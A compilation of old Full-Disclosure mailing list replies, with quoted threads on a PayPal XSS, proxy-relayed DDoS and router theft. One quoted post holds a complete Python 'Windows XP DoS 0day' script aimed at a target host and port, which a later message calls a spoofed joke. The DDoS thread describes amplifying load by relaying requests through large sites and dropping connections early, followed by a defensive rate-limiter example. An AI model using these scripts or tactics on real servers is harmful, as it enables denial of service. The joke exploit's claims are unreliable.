Re: [Full-disclosure] PayPal.com XSS Vulnerability

2013-05-28 Thread Terrence
Robert,

PayPal is actually a cool company and I'm sure they are not worried about
stiffing you on the money that is deserved from the bounty.
Dan actually had some cool words to say about the situation. The XSS is not
extremely complicated, but it is good that you found it. Did they fix the
issue before you disclosed it?

T

--
tuna
65617420646120706f6f20706f6f


On Tue, May 28, 2013 at 11:16 AM, Jeffrey Walton noloa...@gmail.com wrote:

 On Tue, May 28, 2013 at 10:47 AM, Kirils Solovjovs
 kirils.solovj...@kirils.com wrote:
  I suppose PayPal just wants to stay clear of any possible legal
  trouble/issues/complications. It's easier that way.
 Well, I suppose they are going to fix the issue pointed out by Kugler
 (and the additional issues from Parker).

 Do you think PayPal trolls lemonade stands run by children and takes
 their lemonade without paying to avoid possible legal problems?

 Jeff

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS

2012-04-23 Thread Terrence
When he announced to God that his Bible contains XSS, his prayers remained
unanswered.
On Apr 22, 2012 8:23 PM, valdis.kletni...@vt.edu wrote:

 On Sun, 22 Apr 2012 19:59:46 -, Thor (Hammer of God) said:
  You dropped a FD on the BIBLE??  Dude, you're going straight to Hacker
 Hell!  :)

 Wait, wouldn't that require that the unerring Word of God was buggy? ;)


Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

2012-04-17 Thread Terrence
This is awesome!

It's almost as awesome as a privilege escalation from root to root that
works only in BackTrack.

--
tuna
65617420646120706f6f20706f6f



On Tue, Apr 17, 2012 at 10:07,  a...@infosecinstitute.com wrote:
 Guys, this is a fake release; someone spoofed my email and sent this out
 as a joke to mock the wicd release from last week. Please note that if you
 click on the links, there is nothing there concerning this.





 On 04/17/2012 02:48 AM, Adam Behnke wrote:
 Immunity Debugger Remote Denial of Service 0Day. Tested against
 versions 1.76 and 1.80 on Windows XP distributions.

 Has not been tested for potential privilege escalation vectors.

 We first wrote about Immunity Debugger here:
 http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

  Discovered by a student that wishes to remain anonymous in the
 course CTF. This 0day exploit for Windows was discovered by a
 student in the InfoSec Institute Ethical Hacking class, during an
 evening CTF exercise. The student wishes to remain anonymous, he
 has contributed a python version of the 0day. A patch that can be
 applied to Windows has not been made available. You can find a
 python version of the exploit to copy and paste here:


 #!/usr/bin/python
 # Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
 # For full write up and description go to
 # http://www.infosecinstitute.com/courses/ethical_hacking_training.html

 import sys
 import os
 import time
 import getopt
 import socket


 class Error(Exception):
     def __init__(self, error):
         self.errorStr = error

     def __str__(self):
         return repr(self.errorStr)


 class Exploit():

     def __init__(self, targetHost, targetPort):
         self.targetHost = targetHost
         self.targetPort = targetPort

     def exploit(self, targetHost, targetPort):
         # Validate the address, open a TCP connection to the target.
         try:
             socket.inet_aton(targetHost)
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             s.connect((targetHost, targetPort))
         except socket.error:
             raise Error("Unable to exploit (Connect failed.)")

         # exploit: the entire "payload" is three newline characters
         try:
             s.sendto("\n\n\n", (targetHost, targetPort))
         except:
             raise Error("Unable to exploit (Exploit failed.)")


 def usage():
     print "[!] Usage:"
     print "      ( -h, --help ):"
     print "             Print this message."
     print "      ( --targetHost= ): Target host."
     print "             --targetHost=127.0.0.1"
     print "      ( --targetPort= ): Target port."
     print "             --targetPort="


 def main():
     print "[$] Windows XP 0Day"
     try:
         opts, args = getopt.getopt(sys.argv[1:], "h",
                                    ["help", "targetHost=", "targetPort="])
     except getopt.GetoptError, err:
         # Print help information and exit:
         print "[!] Parameter error: " + str(err)  # e.g. "option -a not recognized"
         usage()
         sys.exit(0)

     targetHost = None
     targetPort = None
     for opt, arg in opts:
         if opt in ("-h", "--help"):
             usage()
             sys.exit(0)
         elif opt == "--targetHost":
             targetHost = arg
         elif opt == "--targetPort":
             targetPort = arg
         else:
             # I would be assuming to say we'll never get here.
             print "[!] Parameter error."
             usage()
             sys.exit(0)

     if not targetHost:
         print "[!] Parameter error: targetHost not set."
         usage()
         sys.exit(0)

     if not targetPort:
         print "[!] Parameter error: targetPort not set."
         usage()
         sys.exit(0)

     exploit = Exploit(targetHost, targetPort)

     print "[*] Attempting to exploit: "
     try:
         exploit.exploit(targetHost, int(targetPort))
     except Error as error:
         print "[!] Exploit Error: %s" % (error.errorStr)
         exit(0)
     print "[*] Exploit appears to have worked."


 # Standard boilerplate to call the main() function to begin
 # the program.
 if __name__ == '__main__':
     main()



 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.12 (GNU/Linux)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

 iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
 QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
 hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
 CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
 FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
 z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
 K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
 DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
 jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
 4r6K58WTZ7qR2nTNKnQi
 =Uoev
 -END PGP SIGNATURE-




Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-14 Thread Terrence
Just by glancing at the tool I would bet that this tool has the HTTP
headers misordered too. It's all good; this tool would not be a very
effective DoS tool, but keep up the good work and nice choice of the
Star Fox quote.

--
tuna
65617420646120706f6f20706f6f



On Mon, Feb 13, 2012 at 08:48, adam a...@papsy.net wrote:
 I have to admit that I've only read the posts here, haven't actually
 followed the link, but in response to Gage:

 It entirely depends on how it's being done, specifically: what
 services/applications are being targeted and in what way. If he's proxying
 through big servers such as those owned by Facebook, Google, Wikipedia,
 etc: then it definitely does make a difference. You're assuming that his
 network speed would be the bottleneck, but to make that assumption, you
 first have to assume that he's actually waiting around for response data.

 Maybe it's too early to convey this in an understandable way, I don't know.
 An example scenario that would be effective though: imagine that you run a
 web server, also imagine that there's a resource (CPU/bandwidth) intensive
 script/page on that server. For the sake of discussion, let's assume that my
 home internet speed is 1/10 of your server. We can also probably assume that
 your server's network speed is 1/10 of Google's. If I can force Google's
 server to request that page, that automatically puts me at an advantage
 (especially if I close the connection before Google can send the response
 back to me).

 Even if you're correct about his particular script, the logic behind your
 response is flawed. In the above example, one could use multithreading to
 cycle requests to your server through Google, Facebook, Wikipedia, whoever.
 As soon as the request has been sent, the connection could be terminated. If
 that for some reason wouldn't work, the script could wait until one byte
 is received (e.g. the "2" in "200 OK") and close the connection then. At
 that point, the bandwidth/resources would have already been used.

 The bottom line is that you could easily use the above concepts (and likely
 what the OP has designed) to overpower a server/service while using very
 little resources of your own. It's all circumstantial anyway though. My
 overall point, specifics aside, is that being able to use Google or
 Facebook's resources against a target is definitely beneficial and has all
 kinds of advantages.

 On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.com
 wrote:

 Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent
 server with that using a single box. Sending your request through multiple
 proxies does not magically increase the resource usage of the target, its
 still your output power vs their input pipe. Sure it gives a slight boost in
 anonymity and obfuscation but does not actually increase effectiveness. It
 would even decrease effectiveness because you bear the burden of having to
 send to a proxy, giving them ample time to recover from a given request.

 Even if you look at it as a tactic to bypass blacklisting, you still
 aren't going to overwhelm the server. That means you need more pawns to do
 your bidding. This creates a bit of a problem however, as then all your
 slaves are running through a limited selection of proxies, reducing the
 amount of threats the server needs to blacklist. The circumvention is quite
 obvious, which is to not utilize proxies for the pawns and rely on sheer
 numbers and/or superior resource exhaustion methods.

 On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br
 wrote:

 With the recent wave of DDoS, a concern that was not taken is the model
 where the zombies were not compromised by a Trojan. In the standard
 modeling of a DDoS attack, the machines are purchased, usually in a VPS,
 or are obtained through Trojans, thus forming a botnet. But the
 arbitrary shape doesn't need to acquire a collection of computers.
 Programs, servers and protocols are used to arbitrarily make requests on
 the target. P2P programs are especially vulnerable; DNS, internet
 proxies, and many sites that make requests for users, like Facebook or W3C,
 are too.

 Precisely, I made a proof-of-concept script of 60 lines hitting most
 HTTP servers on the Internet, even if they have protections like
 mod_security or mod_evasive. This can be found at this link [1] on GitHub.
 The solution of the problem depends only on the reformulation of
 protocols and limitations on the number of concurrent requests and
 totals by proxies and programs for a given site, when exceeded returning
 a cached copy of the last request.

 [1] https://github.com/lfamorim/barrelroll

 Cheers,
 Lucas Fernando Amorim
 http://twitter.com/lfamorim

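The mitigation Lucas sketches (cap concurrent and total requests per origin for a given site, and hand back the last cached copy once the cap is hit) together with the "close the connection before the response arrives" relay trick adam describes, worked through as an added example written for this page. It is not code from the barrelroll repository or from any of the posters; the window length, the per-peer limits, the addresses and the sample traffic are assumptions chosen to exercise the logic, and the expensive page is a stand-in for the resource-intensive script in the thread.

```python
"""Per-peer request budget with cached fallback for an expensive page.
Example written for this page, not the barrelroll PoC or any server's
shipping code; limits, addresses and sample traffic are assumptions."""
from collections import defaultdict, deque

WINDOW_SECONDS = 10.0  # assumption: sliding-window length
MAX_PER_WINDOW = 3     # assumption: fresh renders one peer may trigger per window
MAX_INFLIGHT = 2       # assumption: renders one peer may have running at once


class OriginLimiter:
    """Sliding-window count plus concurrency cap, keyed by the TCP peer.

    Keying on X-Forwarded-For would be wrong: the proxy (or the client behind
    it) writes that header, so one box could present unlimited pseudo-origins.
    The peer address is the only origin the server actually observed.
    """

    def __init__(self, max_per_window=MAX_PER_WINDOW,
                 window=WINDOW_SECONDS, max_inflight=MAX_INFLIGHT):
        self.max_per_window = max_per_window
        self.window = window
        self.max_inflight = max_inflight
        self._hits = defaultdict(deque)    # peer -> timestamps of fresh renders
        self._inflight = defaultdict(int)  # peer -> renders currently running

    def try_acquire(self, peer, now):
        """Charge one fresh render to peer and return True, or refuse with False."""
        hits = self._hits[peer]
        while hits and now - hits[0] >= self.window:
            hits.popleft()                 # expire hits that left the window
        if len(hits) >= self.max_per_window or self._inflight[peer] >= self.max_inflight:
            return False
        hits.append(now)
        self._inflight[peer] += 1
        return True

    def release(self, peer):
        """Render finished. The window hit is not refunded, even if the client left."""
        self._inflight[peer] = max(0, self._inflight[peer] - 1)


class ExpensivePage:
    def __init__(self):
        self.renders = 0    # times the real work was done
        self.cached = None  # last body, served to peers that are over budget

    def render(self, now):
        self.renders += 1
        self.cached = "report generated at t=%.1f" % now
        return self.cached


def handle(limiter, page, peer, headers, now, client_closes_early=False):
    """Serve one request -> (status, body, source), source in fresh/cache/none.

    client_closes_early models the relay trick: the client hangs up on the
    first byte of the response. The render already happened, so the budget is
    still charged; only the body goes unsent. headers (X-Forwarded-For etc.)
    is accepted for logging but deliberately never used for keying.
    """
    if limiter.try_acquire(peer, now):
        try:
            body = page.render(now)
        finally:
            limiter.release(peer)
        return (200, None if client_closes_early else body, "fresh")
    if page.cached is not None:
        return (200, page.cached, "cache")  # stale but cheap
    return (429, "rate limited", "none")


# Constructed sample traffic: (time, peer, headers, client_closes_early).
# One peer rotates X-Forwarded-For on every hit, as a relay through several
# open proxies would; a second peer arrives later with its own budget.
SAMPLE_TRAFFIC = [
    (0.0, "203.0.113.7", {"X-Forwarded-For": "198.51.100.9"}, True),
    (0.2, "203.0.113.7", {"X-Forwarded-For": "198.51.100.10"}, True),
    (0.4, "203.0.113.7", {"X-Forwarded-For": "198.51.100.11"}, True),
    (0.6, "203.0.113.7", {"X-Forwarded-For": "198.51.100.12"}, True),
    (1.0, "192.0.2.44", {}, False),
    (11.0, "203.0.113.7", {}, False),
]


def replay(traffic=SAMPLE_TRAFFIC):
    """Run traffic through one limiter -> (list of sources, renders performed)."""
    limiter, page = OriginLimiter(), ExpensivePage()
    sources = [handle(limiter, page, peer, hdrs, now, early)[2]
               for now, peer, hdrs, early in traffic]
    return sources, page.renders   # (['fresh','fresh','fresh','cache','fresh','fresh'], 5)


def inflight_demo():
    """Concurrency cap alone: two renders in progress block a third."""
    lim = OriginLimiter(max_per_window=10, max_inflight=2)
    first = lim.try_acquire("198.51.100.1", 0.0)
    second = lim.try_acquire("198.51.100.1", 0.1)
    third = lim.try_acquire("198.51.100.1", 0.2)   # refused: two still running
    lim.release("198.51.100.1")
    fourth = lim.try_acquire("198.51.100.1", 0.3)  # a slot freed up
    return (first, second, third, fourth)          # (True, True, False, True)
```

In replay(), the fourth hit from 203.0.113.7 inside the window gets the cached body instead of a fifth render, regardless of the fresh X-Forwarded-For value it carries, and the early hang-ups on the first three still count because the work was done before the client left. The inflight cap is what stops the "open many connections and never read" variant; the window cap is what stops the "rotate proxies and close early" variant.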

Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-14 Thread Terrence
Haha, let's all DDoS through Tor and proxies... that's how we speed shit up.
--
tuna
65617420646120706f6f20706f6f



On Mon, Feb 13, 2012 at 14:14, Sanguinarious Rose
sanguiner...@occultusterra.com wrote:
 Ah, what a wonderful gem of pure and real research into today's upcoming
 threats. Today is the day we learn to phear sites like xroxy.com
 because God forbid some of those silly kids using their 9001 proxies
 from their 56k dial-ups will over-run google, youtube, facebook, and
 the world! Dear God what will we do?!?!? When will it end! Think of
 the cute kittens you deprive us of evil proxy hackers!

 Today is the day I learned hackers can cast magick upon outgoing
 packets through proxies to somehow make them more bigger. I propose
 these are some kind of Christian hackers with God on their side to
 manipulate the very foundational laws of physics and electricity!

 Excuse me Mr. Amorim but what God alas do you pray to for this? Is it
 some kind of Christian Magick?

 On Sun, Feb 12, 2012 at 9:09 AM, Lucas Fernando Amorim
 lf.amo...@yahoo.com.br wrote:
 With the recent wave of DDoS, a concern that was not taken is the model
 where the zombies were not compromised by a Trojan. In the standard
 modeling of a DDoS attack, the machines are purchased, usually in a VPS,
 or are obtained through Trojans, thus forming a botnet. But the
 arbitrary shape doesn't need to acquire a collection of computers.
 Programs, servers and protocols are used to arbitrarily make requests on
 the target. P2P programs are especially vulnerable; DNS, internet
 proxies, and many sites that make requests for users, like Facebook or W3C,
 are too.

 Precisely, I made a proof-of-concept script of 60 lines hitting most
 HTTP servers on the Internet, even if they have protections like
 mod_security or mod_evasive. This can be found at this link [1] on GitHub.
 The solution of the problem depends only on the reformulation of
 protocols and limitations on the number of concurrent requests and
 totals by proxies and programs for a given site, when exceeded returning
 a cached copy of the last request.

 [1] https://github.com/lfamorim/barrelroll

 Cheers,
 Lucas Fernando Amorim
 http://twitter.com/lfamorim



Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Terrence
To the guy saying that Comcast requires an executable to authenticate you:
Ha. You should prolly wipe your install.
On Oct 7, 2011 10:41 AM, valdis.kletni...@vt.edu wrote:

 On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said:

  That would probably explain why the Comcast service page downloads an
  executable to authenticate you.  At that point they have control over the
  end user's machine and can either clear the DNS cache or force a reboot.

 That must suck if you're a non-Windows user. ;)


[Full-disclosure] The Case of the Great Router Robbery

2011-05-26 Thread Terrence Miltner
Whereas a home or SOHO router is unlikely to have much more value than
what can be had on eBay, it's a very different story when a corporate
router is concerned.

This article will look at what information can be gleaned from a
stolen Cisco router, the mechanism available to reduce your exposure
in these circumstances, and an evaluation of its effectiveness.

http://resources.infosecinstitute.com/router-robbery/

[Full-disclosure] New malware research posted on Resources at InfoSec Institute

2011-04-27 Thread Terrence Miltner
The InfoSec Institute published an in-depth article on their Resources
website this afternoon about a prominent new player on the malware scene.

The series discusses the first malware to reliably attack x64 operating
systems such as Windows Vista and Windows 7. This technically advanced
malware bypasses various protective measures in various operating systems
and exploits the normal boot process.

You can find the first article, in the series of three, here:

http://resources.infosecinstitute.com/tdss4-part-1/